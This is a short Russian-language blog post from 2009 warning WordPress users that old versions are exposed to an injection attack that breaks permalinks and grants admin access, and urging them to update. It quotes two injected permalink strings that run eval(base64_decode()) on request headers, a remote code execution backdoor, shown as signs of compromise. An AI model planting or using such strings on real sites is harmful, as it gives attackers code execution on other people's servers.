Дом моих мыслей

WordPress. Взлом старых версий

08.09.2009 | Прочитано:6336

WordpressОчередная маст рид заметка о безопасности . Среди читателей и просто блоггеров есть многие, кто еще пользуется старой версией движка. А я вам говорю всегда — обновляться нужно! Как просто обновить WordPress я уже рассказывал, проблем (практически) не бывает в 99% случаев.

Новая уязвимость в старых! версиях позволяет изувечить весь ваш блог. Методом MySQL-инъекции, можно поломать ЧПУ, сделав их совсем не рабочими, а еще злоумышленник получает доступ к администрированию блога!.

Атакованные блоги подвергаются хаку, который добавляет к пермалинку:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или

/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%


Те, кто понял, что угроза не шуточная, прочитайте вот эти два материала. Первый о том, что происходит, а второй — как защититься от проблемы. Не забывайте обновляться до последней версии!

, , Wordpress

Похожие статьи